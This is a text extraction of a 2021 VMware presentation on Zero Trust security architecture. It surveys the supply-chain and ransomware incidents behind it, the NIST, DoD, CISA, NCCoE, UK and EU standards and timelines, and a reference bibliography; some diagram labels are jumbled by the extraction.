Zero Trust

The Concept, Standards, Requirements,

Timeline, Directions

Dennis Moreau,
Sr Engineering Architect, Cybersecurity
VMware, Research and Innovation, Office of the CTO
©2020 VMware, Inc. 9/24/2021
Agenda What is Zero Trust and how does it work (to address supply chain
security, ransomware and complexity)?

Where are the standards now?

NIST ZT Reference Architecture
DoD ZT Reference Architecture
NIST Guidance on ZT for Microservices and Service Mesh
NCCoE Collaboration on ZT
The ZT Timeline
Guidance
NIST NCCoE Audit Guidance
CISA Maturity Model
CISA Cloud security Reference Architecture
Timeline (EO-14028, CMMC, EU NIS2, …)
UK NCSC ZT Architecture Guidelines
EU NIS2 ZT (ENISA) – Parliament vote in November
©2020 VMware, Inc. 2
ZT Assumption of Compromise == Supply Chain Attack.

Colonial Pipeline RW & Exfil Attack (DoubleDip)

• 5000 Mile Pipeline, 100s of Remote Valves, 200 M𝑓𝑡 ! , $5M Ransom, $$$ Business Impact…
• 400,000 Pipeline mile potentially vulnerable. $$$$ Threat is orders of magnitude larger in
just pipeline control, availability, safety
• $$$$$ Remediation – eDesign, Replacement , OpEx++, Reg, …

SunBurst (Solarigate) Supply Chain Attack

• Undetected for 15 Months (despite 18K Security Portfolios & Teams)
• Injected into the DevOps cycle, Global Sourcing (Bulgaria), Inadequate
curation/testing/isolation …
• Triggering standards, regulatory and procurement response (see WH EO)

CodeCov Supply Chain Attack

• Any credentials, tokens, or keys passed to Continuous Integration runner
• Any services, data stores, and application code that could be accessed with these
credentials, tokens, or keys
• 19,000 Customers including IBM, HP, Atlassian, Rapid 7 … who are also participants in supply
chains… downstream damage still being investigated.
©2020 VMware, Inc. 3
Long Undetected Compromises, a Prelude to Many Ransomware .
Supply Chain [1]
– Attacks up by 42% in Q1 of 2021 – Data compromise only increased by 12%
– Q1 SC Attacks: 27 Vendors, 140 Organizations publicly reported as targets, 7.4 M impacted
– Number of affected individuals up by 560%
– Trend is to compromise multiple organizations through one point of attack
– Huge spike in insurance claims due to services outages (MS Exchange Attack 30,000-60,000 Orgs) – Legal, Forensic ,
Cleanup, Disruption and Fines

Increasingly Combined with Data Extortion (ransomware) [2]

– 228 Industrials and Engineering
– 225 Manufacturing
– 145 Technology
– 142 Retail
– 95 Healthcare

Pressure is on governments to “Do Something”!

Enter the EO for Improving National Cybersecurity, NIST, CISA, NSA and the DoD…
Sources (1) Crowdstrike 2021 Global Threat Report
©2020 VMware, Inc. (2) Identity Theft Resource Center 2021 4
Zero Trust – is a very different policy approach …

Continuous, Granular, Policy Enforcement & Containment …

… via Compartmentalization (by application/service)

©2020 VMware, Inc.

ZT Requires that we Assume Compromise … soooo
ZT Assumes compromise in supply chain and in the perimeter … so, compartmentalization is necessary.

©2020 VMware, Inc.

But complete compartmentalization is not very useful …soooo
ZT Applies Compartment-specific policy, continuously.

Least Privilege + Require knowing all “subjects”

Least Functionality + Requires knowing all “objects”
Least Accessibility (crypt) + Requires knowing access needs
Least Exposure (posture) + Requires assessing device, service, platform integrity … dev due car, curation, testing
Coherence (peer, temporal) Requires knowing intended, expected and observed behavior
…

PEP

©2020 VMware, Inc.

ZT Implies Many Continuous Enforcement Points … and Their Alerts
Business Risk
ZT Require Classification by Association to Business Impact : Risk = Prob * Impact
Categorized Function

Categorized Service

…
Comp Criticality <= Categorized Comp
PEP
PEP

PEP
PEP

PEP
PEP

…
…
PEP
PEP

©2020 VMware, Inc.

 ZT Concept Space

ZT Policy
:= (Subjects, Objects, Risk)

Business Risk
Categorized Function

App Trust Anchor Categorized Service

R …
User Trust Anchor Comp Criticality <= Categorized Comp ZT Ref Arch
PEP
Decoupling Bus Policy from Technology
R

Categorized Data

Platform Trust Anchor

ZT Capable Platform (Policy Enablement)

Topology, Isolation, Enforcement

©2020 VMware, Inc.

ZT as of Q2 2021 – The Definitions that Matter

•DISA and NSA, Department of Defense (DOD) Zero Trust Reference Architecture Version 1.0
•NIST, SP 800-207, Zero Trust Architecture
•NSA, Embracing a Zero Trust Security Model

©2020 VMware, Inc. 10

Zero Trust – Why it matters? - The Mandate
https://www.federalregister.gov/documents/2021/05/17/2021-10460/improving-the-nations-
cybersecurity#:~:text=Executive%20Order%2014028%20of%20May%2012%2C%202021%20Improving,it%20is%20hereby%20ordered%20as%20follows%3A%20Section%201.

©2020 VMware, Inc. 11

What is Zero
Trust?

©2020 VMware, Inc. 12

 High-Level ZT Implementation Architecture
What does ZTA look like … by definition.
ZT Architecture

Required ZT Solution Telemetry

ZT Policy Statements
- Aligned on same Subject, Object and
associated Transactional (Business; Not (e.g. OPA, …)
CVSS Risk)

Continuous Inline ZT Enforcement Resources

Subjects (Page 7) Assets (Page 8)
- Logically Adjacent to Resources • Applications
• Users, Roles • Servers, Desktops (Page7) (Objects) • Services
• Service Accounts • Laptops, Tablets, Phones - Authoritative Controls and • Micro-services/Containers (NSA)
• Identity Records (Rep) • Mobile & IoT Devices Independent Verification
• (on Prem, Hosted, Cloud and Edge)
• … 13
©2020 VMware, Inc.
ZTA Implies Layering (end to end)
Risk Aware ZT Policy

Enterprise Business aware ZT Policy

e.g.: OPA + YAML + Stacklet
- Criticality Impact aware – real Risk e.g.: OPA + YAML + RiskMap
- Aligned from User To Enterprise Application e.g.: OPA + YAML + Stacklet
- Entitlement and Anomaly Informed
(Subject, Object, Criticality/Importance)

User/Device/App Session/Host/Hosted Service ID/Container/Application-Micro-service, SM

Aligned ZT Conformant Policy (EU) Aligned ZT Conformant Policy (GW) Aligned ZT Conformant Policy (SM)
(Subject, Object, Criticality/Importance) (Subject, Object, Criticality/Importance) (Subject, Object, Criticality/Importance)
©2020 VMware, Inc. 14
NSA Caveat on Partial ZTA Implementations (limited ZT protection)
When adding fractional ZT makes policy management less effective (NSA) Also see EO 10(k)
Enterprise Business aware ZT Policy
- Criticality Impact aware – real Risk
- Aligned from User To Enterprise Application
Conventional Policy Structure - Entitlement and Anomaly Informed
(Non-ZT)

User/Device/App Session/Host/Hosted Service ID/Container/Application-Micro-service

Non-ZT Non-ZT

Typically mis-aligned User/Device/App - Session/Host/Hosted Service False sense of ZT

Mis-configured Intention (guard rails – Config, Roles, Classification) and Observation (verification –
EDR, ML)
Traditional scattered security architecture (Policy aligned on VPN, VLAN, Perimeter, …)

https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF
©2020 VMware, Inc. 15
CISA ZT Maturity Model (DRAFT - PC Opened 9/2021)
https://www.cisa.gov/sites/default/files/publications/CISA%20Zero%20Trust%20Maturity%20Model_Draft.pdf

©2020 VMware, Inc. 16

Important Observations from CISA ZT MM Document
[Page ii]
• The path to zero trust is an incremental process that will take years to implement.
• Legacy infrastructure and systems may not support a zero trust implementation.

[Page 2] Zero trust presents a shift from a location-centric model to a more data-centric approach for fine-grained
security controls between users, systems, data and assets that change over time; for these reasons, moving to a ZTA is
non-trivial. This provides the visibility needed to support the development, implementation, enforcement, and evolution
of security policies. More fundamentally, zero trust may require a change in an organization’s philosophy and culture
around cybersecurity. The path to zero trust is a journey that will take years to implement.

[Page 3] 6. Challenge The Federal Government faces several challenges in transitioning to ZTA. First, legacy systems rely
on “implicit trust”; this concept conflicts with the core principle of adaptive evaluation of trust within a ZTA. Additionally,
existing infrastructures are also built on implicit trust and must either be rebuilt or replaced. To rebuild or replace
information technology (IT) infrastructure and mission systems requires a significant investment on the part of agencies.
Lastly, there is no consensus on or formal adoption of a maturity model for ZTA. While proposals for maturity models
have been put forth, current initiatives for kickstarting zero trust adoption are often focused on the network layer and do
not present a holistic approach for transition

©2020 VMware, Inc. 17

CISA MM Transitioning to ZT [Page 4]
https://www.cisa.gov/sites/default/files/publications/CISA%20Zero%20Trust%20Maturity%20Model_Draft.pdf

Transitioning to Zero Trust:

1. Identify Actors on the Enterprise.
2. Identify Assets Owned by the Enterprise.
3. Identify Key Processes and Evaluate Risks Associated with Executing Process.
• The Basis for Business Impact (Risk)

4. Formulating Policies for the ZTA Candidate.

5. Identifying Candidate Solutions.
6. Initial Deployment and Monitoring

©2020 VMware, Inc. 18

OMB Updates
M-Series Memos

OMB owns policy and contract language.

• Federal Zero Trust Strategy - Moving the U.S.
Government Towards Zero Trust Cybersecurity
Principles -
https://zerotrust.cyber.gov/downloads/Office%20
of%20Management%20and%20Budget%20-
%20Federal%20Zero%20Trust%20Strategy%20-
%20DRAFT%20For%20Public%20Comment%20-
%202021-09-07.pdf

©2020 VMware, Inc.

Where are we now?

©2020 VMware, Inc. 20

What does ZT look over existing technology
DoD ZT Reference Architecture: https://dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v1.1(U)_Mar21.pdf

CB

CB

CB

©2020 VMware, Inc. 21

 What does ZT look employing existing technology
DoD ZT Reference Architecture: https://dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v1.1(U)_Mar21.pdf
Device Posture

ZT Policy Expression
• PEP Policy Deployment
• Subjects, Objects

Continuous Risk Eval

Container Granularity
Containment/Isolation Intentional Classification of
App Trust Anchor Sensitivity
Subject Trust Anchor
Object Trust Anchor

©2020 VMware, Inc. 22

Application Trust Anchor based on “shifted left” security context

©2020 VMware, Inc. https://www.nist.gov/system/files/documents/2021/07/13/Developer%20Verification%20of%20Software.pdf 23

ZT Applies to Operation of “Critical Software”
… not just how you build secure stuff.

Zero Trust cited in 10 separate audit controls for the compliant and
certifiable operation of “Critical Software”. ZT is not just a product
capability for customers, it is also the kind of policy that is expected
to constrain thecutomer’s operation of our platform.

https://www.nist.gov/system/files/documents/2021/07/09/Critical%20Software%20Use%20Security%2
0Measures%20Guidance.pdf

©2020 VMware, Inc. 24

Enter NIST NCCoE
https://www.nccoe.nist.gov/projec
ts/building-blocks/zero-trust-
architecture

©2020 VMware, Inc. 25

 NCCoE Names 18 Firms for Zero Trust Collaboration Project | NCCoE (nist.gov)
NCCoE Names 18 Firms for Zero Trust Collaboration Project
Friday, July 23, 2021

The National Institute of Standards and Technology’s (NIST) National Cybersecurity Center of Excellence (NCCoE) has named 18 firms it will work with on NCCoE’s
Implementing a Zero Trust Architecture Project.
The 18 companies – all of whom answered a public call for collaborators and entered a related cooperative research and development agreement with NCCoE – will work
with the organization to demonstrate approaches to implementing zero trust architectures designed and deployed according the concepts and tenets in NIST’s Special
Publication (SP) 800-207 on Zero Trust Architecture.

The goal of the project is to produce a publicly available NIST Cybersecurity Practice Guide that shows the practical steps to implement the cybersecurity reference designs.
Natalia Martin, NCCoE’s acting director, said the center received “an overwhelming response from the vendor community on this important project.”

“Implementing a zero trust architecture has become a Federal cybersecurity mandate and a business imperative,” she said. “We are excited to work with industry
demonstrating various approaches to implementing a zero trust architecture using a diverse mix of vendor products and capabilities, and share how-to guidance and
lessons learned from the experience.”

The 18 firms are: Amazon Web Services, Inc.; Appgate; Cisco Systems, Inc.; F5 Networks, Inc.; FireEye, Inc.; Forescout Technologies, Inc.; International Business Machines
Corporation (IBM); McAfee Corp.; Microsoft Corporation; MobileIron, Inc. an Ivanti Company; Okta, Inc.; Palo Alto Networks; PC Matic, Inc.; Radiant Logic, Inc.; SailPoint
Technologies, Inc.; Symantec, a Division of Broadcom; Tenable, Inc.; and Zscaler, Inc.

“Zero trust is a team sport and the NIST NCCoE is taking the initiative to bring together best-of-breed zero trust leaders,” commented Stephen Kovac, Vice President of
Global Government and Head of Corporate Compliance at Zscaler.

“We are all committed to collaborating and demonstrating different, practical approaches to implement a zero trust architecture,” he said. “As we know, no one solution fits
every situation. Zscaler is honored to be a part of this coalition working side by side to realize the opportunity for zero trust to strengthen every agency’s cyber defenses.”
“Cisco is happy to be a National Center of Excellence Partner (NCEP) of NCCoE since the beginning and are proud to continue contributing to their SP 1800 documents,”
said Peter Romness, Cybersecurity Principal, U.S. Public Sector CTO Office, at Cisco. “These publications are used by governments and businesses around the world has
guides to implement their own cybersecurity capabilities.”
“Zero Trust is a hot topic and our customers are looking for guidance from an impartial, trusted source like NIST,” he said. “Their SP 800-207 – Zero Trust Architecture, is
already being used to understand zero trust. This new project will show examples of how to implement zero trust. We’re thrilled we were selected to help.”

©2020 VMware, Inc. 26

NCCoE Evaluation Comparative Scenarios (Pages 5-6)
May be phased due to market balkanization of policy across segments and telemetries.

Scenario 1: Employee Access to Corporate Resources An employee is looking for easy and secure access to corporate resources, from
any work location.

Scenario 2: Employee Access to Internet Resources An employee is trying to access the public internet to accomplish some tasks.

Scenario 3: Contractor Access to Corporate and Internet Resources A contractor is trying to access certain corporate resources and
the internet.

Scenario 4: Inter-server Communication Within the Enterprise Corporate services often have different servers communicating with
each other. For example, a web server communicates with an application server.

Scenario 5: Cross-Enterprise Collaboration with Business Partners Two enterprises In this scenario, the ZTA solution implemented in
this project will enable users from one enterprise to securely access specific resources from the other enterprise, and vice versa.

Scenario 6: Develop Trust Score/Confidence Level with Corporate Resources. . In this scenario, a ZTA solution will integrate these
monitoring and SIEM systems with the policy engine to produce more precise calculation of trust scores/confidence levels in near
real time.

©2020 VMware, Inc. https://www.nccoe.nist.gov/sites/default/files/library/project-descriptions/zta-project-description-final.pdf 27

CISA Cloud Security Ref Arch (DRAFT - PC Opened 9/2021)
https://www.cisa.gov/sites/default/files/publications/CISA%20Cloud%20Security%20Technical%20Reference%20Architecture_Version%201.pdf

CISA CSRA Refers to Zero Trust 38 times:

“…
As agencies continue to use cloud technology, they shall do so in a coordinated, deliberate way
that allows the Federal Government to prevent, detect, assess, and remediate cyber incidents. To
facilitate this approach, the migration to cloud technology shall adopt zero trust architecture, as
practicable. The CISA shall modernize its current cybersecurity programs, services, and
capabilities to be fully functional with cloud-computing environments with zero trust
architecture. The Secretary of Homeland Security acting through the Director of CISA, in
consultation with the Administrator of General Services acting through the FedRAMP within the
General Services Administration, shall develop security principles governing Cloud Service
Providers (CSPs) for incorporation into agency modernization efforts. To facilitate this work:
[…]
Within 90 days of the date of this order, the Secretary of Homeland Security acting through the
Director of CISA, in consultation with the Director of OMB and the Administrator of General
Services acting through FedRAMP, shall develop and issue, for the Federal Civilian Executive
Branch (FCEB), cloud-security technical reference architecture documentation that
illustrates recommended approaches to cloud migration and data protection for agency
data collection and reporting.
…”

©2020 VMware, Inc. 28

 Risk

ZT Leverages DevSecOps
Mitigate Appetite
CJA
RiskMap STIX
The Platform Role: Governance
CyBOX
Zero Trust + Supply Chain + Dev… Assess Classify

D3FEND
Risk Assessment:
Monitor
Policy: e.g. OSCAL, CRMF SCAPv2
SCAPv2 e.g. NIST Zero TrustBus/Mission Objective Bus/Mission Objective
SP 800-207 • Policy • Performance
InSPEC • Criticality • Compliance ATT&CK
• Classification • Incident
SP 800-161 • Investment • Impact
NIST SP 800-171 CUI, NIST SP
Mitigate
Risk
Appetite Application/Service Artifacts 800-172 CUI Enh.
Platform ID, Dep, Meta Threat
• Observation Alerts Respond Intel
• Signatures
• Ops Context
• Diagnostic Forensics • Severities

Development • Anomalies • Behaviors

Platform ID, Dep, Meta Platform Platform ID, Dep, Meta
• Recommendations
Threat
Assess Classify Application/Service Artifacts
Threat Analyze Monitor
• Passive Test
• Indicators
• Image
• Behaviors
• Intended Behavior Platform ID, Dep, Meta
Monitor • Analyses
• Active Test Results
• Mitigation Efficacy
• Observed Ops Behavior in Test Triage
• SWID Instance Instance
• SWID • Isolate NIST SP 800-171A, NIST SP
CI/CD Logs: SSDF
OpenAPI • Behavior • Monitor 800-172A CUI Enh. STIX
SP800-161A • Res Demand • Instantiate, Ref Arch
InSPEC • Ops Anomaly • Failover, Scale, Recover
Logs: SCAP/InSpec Inst SCAP/InSpec Assessment
Deploy Monitor CyBOX
• LEEF Ref Arch: C4, DoDAF, Tech Context
• CIM SABSA, OpenDXL
• CADF Operation
• ARF
• … Optimize Triage
Kestrel SCAPv2
©2020 VMware, Inc. STIX Shifter InSPEC
Analyze
NIST and the EO 14028 (Where ZT is headed)
https://www.nist.gov/itl/executive-order-improving-nations-cybersecurity

©2020 VMware, Inc. 30

Scope + Timeline

EO-14028 Timeline (Adolus)

• https://info.adolus.com/eo14028-timeline
• Demostrates progressive refinement of
requirements as they eminate from NIST, CISA,
OMB, and FAR changes.

©2020 VMware, Inc.

Zero Trust - UK
NSCS Zero Trust Architecture –
https://www.ncsc.gov.uk/collection/zero-trust-architecture
https://www.ncsc.gov.uk/section/ncsc-for-startups/overview
https://www.ncsc.gov.uk/blog-post/zero-trust-1-0
UK NCSC ZT Architecture Principles

1. Know your architecture, including users, devices,

services and data.

2. Know your User, Service and Device identities.

3. Assess your user behaviour, device and service

health.

4. Use policies to authorise requests.

5. Authenticate & Authorise everywhere.

6. Focus your monitoring on users, devices and services.

7. Don't trust any network, including your own.

8. Choose services designed for zero trust.

©2020 VMware, Inc. 32
EU NIS2 and ZT – Parliament Vote now in November

©2020 VMware, Inc. 33

 Look Familiar??
EU Supply Chain & DevSecOps & Incident/Vuln Reporting
https://www.europarl.europa.eu/RegData/etudes/BRIE/2021/689333/EPRS_BRI(2021)689333_EN.pdf
https://www.europarl.europa.eu/RegData/etudes/STUD/2021/653637/EXPO_STU(2021)653637_EN.pdf

Technical:
• Enforcement of strong Authentication and
Access Controls
• Establishes CVE and related standards &
coordination agreements to other CVE-based
registries
• Establishes top level DNS mandate
• Zero Trust – Priority 7 - ENISA

©2020 VMware, Inc. 34

ZT Guidance
• NIST NCCoE ZTA Security Measures/Controls
• CISA Maturity Model
• CISA Cloud security Reference Architecture
• NIST and the EO Timeline (pacing of additional ZT
standards and guidance)

©2020 VMware, Inc. 35

 NCCoE ZTA Security Control Map. Comparison and Audit of ZTAs
What’s “Good Enough”? Pages 11-14
+SBOM

Multiple telemetry/sensor types

collected and correlated (separation of Network, Endpoint,
Service … telemetry/analytics is not the intent)

Known Payload Ident Required

LP + LF
No single point of policy enforcement Known Vuln Ident Required

https://www.nccoe.nist.gov/sites/default/files/library/project-descriptions/zta-project-description-
final.pdf
Granular Isolation
©2020 VMware, Inc. NSA: Container level at least.` 36
ZT Direction: ZT in Audit
200,000 Auditors : One ZT Definition

©2020 VMware, Inc. 37

 ZT Audit Prep - Global

CACS Global Auditor Guidance

©2020 VMware, Inc. 38

CISA Cloud Security Ref Arch (DRAFT - PC Opened 9/2021)
https://www.cisa.gov/sites/default/files/publications/CISA%20Cloud%20Security%20Technical%20Reference%20Architecture_Version%201.pdf

CISA CSRA Refers to Zero Trust 38 times:

“…
As agencies continue to use cloud technology, they shall do so in a coordinated, deliberate way
that allows the Federal Government to prevent, detect, assess, and remediate cyber incidents. To
facilitate this approach, the migration to cloud technology shall adopt zero trust architecture, as
practicable. The CISA shall modernize its current cybersecurity programs, services, and
capabilities to be fully functional with cloud-computing environments with zero trust
architecture. The Secretary of Homeland Security acting through the Director of CISA, in
consultation with the Administrator of General Services acting through the FedRAMP within the
General Services Administration, shall develop security principles governing Cloud Service
Providers (CSPs) for incorporation into agency modernization efforts. To facilitate this work:
[…]
Within 90 days of the date of this order, the Secretary of Homeland Security acting through the
Director of CISA, in consultation with the Director of OMB and the Administrator of General
Services acting through FedRAMP, shall develop and issue, for the Federal Civilian Executive
Branch (FCEB), cloud-security technical reference architecture documentation that
illustrates recommended approaches to cloud migration and data protection for agency
data collection and reporting.
…”

©2020 VMware, Inc. 39

 Zero Trust Extension
Implementing Zero Trust
Zero Trust – driving out implicit trust and reducing policy
misconfiguration
§ Assume compromise of … endpoint, host, supply chain, app,
account, integrity -> continuous independent verification on
granular isolation
§ Establish the identity all subjects and continuously verify
§ Assure confidentiality, Integrity, Availability of all objects and
continuously verify
§ Classify all interactions according to business risk
§ ZT Reference Architectures Enable
§ logical colocation of intentional and observational controls
§ On boundaries logically close to subject to be protected and subjects to be
controlled
§ https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-207.pdf
§ https://www.nccoe.nist.gov/sites/default/files/library/project-descriptions/zta-project-description-
final.pdf
– ZT Multi-Cloud: https://www.nist.gov/news-events/events/2021/01/devsecops-and-zero-trust-architecture-zta-
multi-cloud-environments

– ZT Service Mesh: https://csrc.nist.gov/publications/detail/sp/800-204b/draft

©2020 VMware, Inc. 40

Recap

What is Zero Trust and how does it work (to address supply chain security, ransomware and complexity)?

Where are the standards now?

NIST ZT Reference Architecture
DoD ZT Reference Architecture
NIST Guidance on ZT for Microservices and Service Mesh
NCCoE Collaboration on ZT
The ZT Timeline
Guidance
NIST NCCoE Audit Guidance
CISA Maturity Model
CISA Cloud security Reference Architecture
Timeline (EO-14028, CMMC, EU NIS2, …)
UK NCSC ZT Architecture Guidelines
EU NIS2 ZT (ENISA) – Parlement vote in November

©2020 VMware, Inc. 41

Thank You
Feedback, Questions, Followups and Collaboration
[email protected]

©2020 VMware, Inc. 42

 Appendix of Relevant Sources for ZTA Technical Requirements
From NIST bibliography on ZTA
NIST Cybersecurity Framework v.1.1, Framework for Improving Critical Infrastructure • NIST SP 800-124 Revision 2 (Draft), Guidelines for Managing the Security of Mobile
Cybersecurity Devices in the Enterprise
https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-124r2-draft.pdf
• NIST SP 800-30 Revision 1, Guide for Conducting Risk Assessments • NIST SP 800-160 Vol. 2, Developing Cyber Resilient Systems: A Systems Security
https://doi.org/10.6028/NIST.SP.800-30r1 Engineering Approach
• NIST SP 800-37 Revision 2, Risk Management Framework for Information Systems and https://csrc.nist.gov/publications/detail/sp/800-160/vol-2/final
Organizations: A System Life Cycle Approach For Security and Privacy • NIST SP 800-162, Guide to Attribute Based Access Control (ABAC) Definition and
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-37r2.pdf Considerations
• NIST SP 800-40 Revision 3, Guide to Enterprise Patch Management Technologies https://nvlpubs.nist.gov/nistpubs/specialpublications/NIST.sp.800-162.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-40r3.pdf • NIST SP 800-175B, Guideline for Using Cryptographic Standards in the Federal
• NIST SP 800-46 Revision 2, Guide to Enterprise Telework, Remote Access, and Bring Your Government: Cryptographic Mechanisms
Own Device (BYOD) Security https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-175b.pdf
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-46r2.pdf • NIST SP 800-171 Revision 2, Protecting Controlled Unclassified Information in
• NIST SP 800-53 Revision 4, Security and Privacy Controls for Federal Information Nonfederal Information Systems and Organizations
Systems and Organizations https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-171r2.pdf
https://csrc.nist.gov/csrc/media/publications/sp/800-53/rev-4/archive/2013-04-30/documents/sp800-53- • NIST SP 800-205, Attribute Considerations for Access Control Systems
rev4-ipd.pdf https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-205.pdf
• NIST SP 800-57 Part 1 Revision 4, Recommendation for Key Management: Part 1: General • NIST SP 800-207 (Second Draft), Zero Trust Architecture
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-57pt1r4.pdf https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-207-draft2.pdf
• NIST SP 800-61 Revision 2, Computer Security Incident Handling Guide • NIST SP 1800-3, Attribute Based Access Control
http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf https://www.nccoe.nist.gov/sites/default/files/library/sp1800/abac-nist-sp1800-3-draft-v2.pdf
• NIST SP 800-63 Revision 3, Digital Identity Guidelines • Cloud Security Alliance, Software Defined Perimeter Working Group, SDP Specification
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-63-3.pdf 1.0
• NIST SP 800-92, Guide to Computer Security Log Management https://downloads.cloudsecurityalliance.org/initiatives/sdp/SDP_Specification_1.0.pdf
http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-92.pdf • ISO/IEC 27001, Information Technology–Security Techniques–Information Security
• NIST SP 800-114 Revision 1, User's Guide to Telework and Bring Your Own Device Management Systems
(BYOD) Security • American Council for Technology-Industry Advisory Council, Zero Trust Cybersecurity
https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-114r1.pdf Current Trends
• NIST SP 800-122, Guide to Protecting the Confidentiality of Personally Identifiable https://www.actiac.org/system/files/ACTIAC%20Zero%20Trust%20Project%20Report%2004182019.pdf
Information (PII) • Federal Information Processing Standards 140-3, Security Requirements for
https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-122.pdf Cryptographic Modules
https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.140-3.pdf

©2020 VMware, Inc. 43